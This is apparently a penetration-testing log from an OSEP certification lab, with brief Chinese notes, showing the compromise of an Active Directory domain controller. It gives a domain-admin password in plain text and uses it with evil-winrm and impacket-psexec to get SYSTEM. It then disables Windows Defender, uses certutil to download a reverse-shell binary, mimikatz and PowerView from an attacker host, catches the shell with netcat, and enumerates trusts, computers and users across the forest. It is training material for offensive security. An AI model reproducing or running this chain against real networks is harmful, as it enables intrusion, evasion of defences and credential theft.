pete是ops.comply.com域的域管:
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ evil-winrm -u ops.comply.com\\\\pete -p '0998ASDaas2' -i 172.16.64.165
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\pete\\Documents> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
68032d41ce0f31dd5a2b96031dad9936
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> hostname
cdc07
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.165
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> whoami
ops\\pete
在/etc/hosts里面增加一条记录:172.16.64.165 cdc07.ops.comply.com
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec ops.comply.com/pete:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] [Errno Connection error (cdc07.ops.comply.com:445)] [Errno -2] Name or service not known
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ impacket-psexec ops.comply.com/pete:[email protected] 1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on cdc07.ops.comply.com.....
[*] Found writable share ADMIN$
[*] Uploading file zoqGBUWQ.exe
[*] Opening SVCManager on cdc07.ops.comply.com.....
[*] Creating service aemM on cdc07.ops.comply.com.....
[*] Starting service aemM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> hostname
cdc07
C:\\Windows\\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> more proof.txt
**68032d41ce0f31dd5a2b96031dad9936**
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/rev.exe> rev.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> certutil.exe -urlcache -f <http://192.168.49.64/PowerView.ps1> PowerView.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop>
c:\\Users\\Administrator\\Desktop> rev.exe
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 62548
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\Users\\Administrator\\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1
PS C:\\Users\\Administrator\\Desktop> Get-DomainTrust
Get-DomainTrust
SourceName : ops.comply.com
TargetName : comply.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 7/15/2020 8:42:49 PM
WhenChanged : 8/1/2022 8:08:03 AM
PS C:\\Users\\Administrator\\Desktop> Get-DomainComputer -Domain comply.com
Get-DomainComputer -Domain comply.com
pwdlastset : 8/1/2022 12:52:44 AM
logoncount : 62
msds-generationid : {84, 58, 56, 226...}
serverreferencebl : CN=RDC02,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=comply,DC=c
om
badpasswordtime : 12/31/1600 4:00:00 PM
useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname : CN=RDC02,OU=Domain Controllers,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 12:52:44 AM
name : RDC02
objectsid : S-1-5-21-1135011135-3178090508-3151492220-1000
samaccountname : RDC02$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : RDC02
whenchanged : 8/1/2022 7:52:44 AM
instancetype : 4
msdfsr-computerreferencebl : CN=RDC02,CN=Topology,CN=Domain System
Volume,CN=DFSR-GlobalSettings,CN=System,DC=comply,DC=com
objectguid : d83c0809-c0f1-41cd-bad6-0370f276467e
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/rdc02.comply.com, TERMSRV/RDC02,
TERMSRV/rdc02.comply.com, ldap/rdc02.comply.com/ForestDnsZones.comply.com...}
usncreated : 12293
lastlogon : 8/1/2022 12:52:52 AM
badpwdcount : 0
msds-supportedencryptiontypes : 28
whencreated : 7/15/2020 8:25:47 PM
countrycode : 0
primarygroupid : 516
iscriticalsystemobject : True
usnchanged : 69695
ridsetreferences : CN=RID Set,CN=RDC02,OU=Domain Controllers,DC=comply,DC=com
dnshostname : rdc02.comply.com
PS C:\\Users\\Administrator\\Desktop> Get-DomainComputer
Get-DomainComputer
pwdlastset : 8/1/2022 12:53:03 AM
logoncount : 62
msds-generationid : {124, 50, 90, 250...}
serverreferencebl : CN=CDC07,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=comply,DC=c
om
badpasswordtime : 12/31/1600 4:00:00 PM
useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
distinguishedname : CN=CDC07,OU=Domain Controllers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 12:53:03 AM
name : CDC07
objectsid : S-1-5-21-2032401531-514583578-4118054891-1000
samaccountname : CDC07$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : CDC07
whenchanged : 8/1/2022 7:53:03 AM
instancetype : 4
msdfsr-computerreferencebl : CN=CDC07,CN=Topology,CN=Domain System
Volume,CN=DFSR-GlobalSettings,CN=System,DC=ops,DC=comply,DC=com
objectguid : 5de4c373-8239-4cf3-afff-1a21c41656cf
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
serviceprincipalname : {ldap/cdc07.ops.comply.com/DomainDnsZones.ops.comply.com,
ldap/cdc07.ops.comply.com/ForestDnsZones.comply.com,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/cdc07.ops.comply.com, TERMSRV/CDC07...}
usncreated : 12293
lastlogon : 8/1/2022 12:53:15 AM
badpwdcount : 0
msds-supportedencryptiontypes : 28
whencreated : 7/15/2020 8:43:38 PM
countrycode : 0
primarygroupid : 516
iscriticalsystemobject : True
usnchanged : 69696
ridsetreferences : CN=RID Set,CN=CDC07,OU=Domain Controllers,DC=ops,DC=comply,DC=com
dnshostname : cdc07.ops.comply.com
pwdlastset : 8/1/2022 12:55:06 AM
logoncount : 63
badpasswordtime : 8/1/2022 12:54:46 AM
distinguishedname : CN=PROXY01,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 12:55:06 AM
name : PROXY01
objectsid : S-1-5-21-2032401531-514583578-4118054891-1105
samaccountname : PROXY01$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : PROXY01
whenchanged : 8/1/2022 7:55:06 AM
instancetype : 4
usncreated : 13105
objectguid : 8d4f1889-8fb9-4593-8b8b-2176029a5d0d
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/16/2020 6:43:32 AM, 7/15/2020 9:41:16 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {WSMAN/proxy01, WSMAN/proxy01.ops.comply.com, TERMSRV/PROXY01,
TERMSRV/proxy01.ops.comply.com...}
lastlogon : 8/1/2022 2:31:39 AM
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/15/2020 9:28:20 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
msds-supportedencryptiontypes : 28
usnchanged : 69762
dnshostname : proxy01.ops.comply.com
pwdlastset : 8/1/2022 1:08:48 AM
logoncount : 72
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=JUMP09,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 12:53:49 AM
name : JUMP09
objectsid : S-1-5-21-2032401531-514583578-4118054891-1106
samaccountname : JUMP09$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : JUMP09
whenchanged : 8/1/2022 8:14:48 AM
instancetype : 4
usncreated : 13129
objectguid : 09e4b024-6ae9-4e2e-9326-85acd9d7a298
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/16/2020 6:43:32 AM, 7/15/2020 9:50:12 PM, 7/15/2020 9:41:16 PM, 1/1/1601
12:00:00 AM}
serviceprincipalname : {WSMAN/jump09, WSMAN/jump09.ops.comply.com, TERMSRV/JUMP09,
TERMSRV/jump09.ops.comply.com...}
lastlogon : 8/1/2022 2:23:29 AM
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/15/2020 9:29:45 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
msds-supportedencryptiontypes : 28
usnchanged : 69864
dnshostname : jump09.ops.comply.com
pwdlastset : 8/1/2022 1:08:46 AM
logoncount : 78
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=FILE06,OU=OpsFileServers,OU=OpsServers,OU=OpsComputers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 12:53:46 AM
name : FILE06
objectsid : S-1-5-21-2032401531-514583578-4118054891-1107
samaccountname : FILE06$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : FILE06
whenchanged : 8/1/2022 8:08:46 AM
instancetype : 4
usncreated : 13152
objectguid : b487f763-cbe5-40c8-871e-4a6aab2ec2b3
operatingsystem : Windows Server 2019 Standard
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/16/2020 6:43:44 AM, 7/16/2020 6:43:32 AM, 7/15/2020 9:41:16 PM, 1/1/1601 12:00:00
AM}
serviceprincipalname : {TERMSRV/FILE06, TERMSRV/file06.ops.comply.com, WSMAN/file06,
WSMAN/file06.ops.comply.com...}
lastlogon : 8/1/2022 2:23:27 AM
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/15/2020 9:30:55 PM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
msds-supportedencryptiontypes : 28
usnchanged : 69832
dnshostname : file06.ops.comply.com
pwdlastset : 8/1/2022 1:13:33 AM
logoncount : 6
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=crack,CN=Computers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 8/1/2022 1:16:51 AM
name : crack
objectsid : S-1-5-21-2032401531-514583578-4118054891-6101
samaccountname : crack$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
cn : crack
whenchanged : 8/1/2022 8:16:51 AM
instancetype : 4
usncreated : 69858
objectguid : 7490740e-dcbd-4039-9940-1ee0ed62e0bf
lastlogon : 8/1/2022 1:41:08 AM
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/crack, HOST/crack, RestrictedKrbHost/crack.ops.comply.com,
HOST/crack.ops.comply.com}
ms-ds-creatorsid : {1, 5, 0, 0...}
badpwdcount : 0
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 8/1/2022 8:13:33 AM
countrycode : 0
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 69871
dnshostname : crack.ops.comply.com
PS C:\\Users\\Administrator\\Desktop> Get-DomainUser
Get-DomainUser
logoncount : 44
iscriticalsystemobject : True
description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 8/1/2022 12:52:55 AM
name : Administrator
objectsid : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 8/1/2022 7:52:55 AM
instancetype : 4
usncreated : 8196
objectguid : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain
Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon : 8/1/2022 12:52:57 AM
badpasswordtime : 9/21/2020 5:40:22 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:51:52 AM
usnchanged : 69689
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:42:49 PM
instancetype : 4
usncreated : 8197
objectguid : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:58:48 PM
instancetype : 4
usncreated : 12300
objectguid : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:43:38 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged : 13044
logoncount : 16
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Pete
lastlogontimestamp : 8/1/2022 2:07:06 AM
userprincipalname : [email protected]
name : Pete
objectsid : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname : pete
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Pete
whenchanged : 8/1/2022 9:07:06 AM
instancetype : 4
usncreated : 13078
objectguid : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname : Pete
memberof : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 8/1/2022 2:27:46 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 9:18:26 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 2:18:26 PM
usnchanged : 69944
logoncount : 4
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Nina
lastlogontimestamp : 7/15/2020 11:49:19 PM
userprincipalname : [email protected]
name : Nina
objectsid : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname : nina
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Nina
whenchanged : 7/16/2020 6:49:19 AM
instancetype : 4
usncreated : 13717
objectguid : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname : Nina
memberof : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon : 7/15/2020 11:51:58 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/16/2020 6:48:28 AM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 11:48:28 PM
usnchanged : 13726
PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -Domain comply.com**
Get-DomainUser -Domain comply.com
logoncount : 50
iscriticalsystemobject : True
description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 8/1/2022 12:52:38 AM
name : Administrator
objectsid : S-1-5-21-1135011135-3178090508-3151492220-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 8/1/2022 7:52:38 AM
instancetype : 4
usncreated : 8196
objectguid : 208616bc-47bb-42fc-931f-a5ea021c82b6
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=comply,DC=com, CN=Domain
Admins,CN=Users,DC=comply,DC=com, CN=Enterprise Admins,CN=Users,DC=comply,DC=com, CN=Schema
Admins,CN=Users,DC=comply,DC=com...}
lastlogon : 8/1/2022 12:52:39 AM
badpasswordtime : 11/6/2020 4:44:48 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:24:22 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:52:21 AM
usnchanged : 69689
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-1135011135-3178090508-3151492220-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:24:22 PM
instancetype : 4
usncreated : 8197
objectguid : 7b53e4be-388c-4d02-9848-da6302ad67bb
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:24:22 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-1135011135-3178090508-3151492220-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:40:57 PM
instancetype : 4
usncreated : 12324
objectguid : a8468773-3587-4278-b288-222c30b2a742
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:25:47 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:25:47 PM
msds-supportedencryptiontypes : 0
usnchanged : 12830
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Nicky,OU=ComAdmins,OU=ComUsers,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Nicky
userprincipalname : [email protected]
name : Nicky
objectsid : S-1-5-21-1135011135-3178090508-3151492220-1103
samaccountname : nicky
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Nicky
whenchanged : 7/15/2020 8:40:57 PM
instancetype : 4
usncreated : 12798
objectguid : 42dc1442-d1f9-47ee-b1e3-84024b5e720c
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 1/1/1601 12:00:00 AM}
givenname : Nicky
memberof : CN=Enterprise Admins,CN=Users,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:37:23 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:37:23 PM
usnchanged : 12813
PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser**
Get-DomainUser
logoncount : 44
iscriticalsystemobject : True
description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 8/1/2022 12:52:55 AM
name : Administrator
objectsid : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 8/1/2022 7:52:55 AM
instancetype : 4
usncreated : 8196
objectguid : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain
Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon : 8/1/2022 12:52:57 AM
badpasswordtime : 9/21/2020 5:40:22 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:51:52 AM
usnchanged : 69689
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:42:49 PM
instancetype : 4
usncreated : 8197
objectguid : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:42:49 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:58:48 PM
instancetype : 4
usncreated : 12300
objectguid : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:43:38 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged : 13044
logoncount : 16
badpasswordtime : 12/31/1600 4:00:00 PM
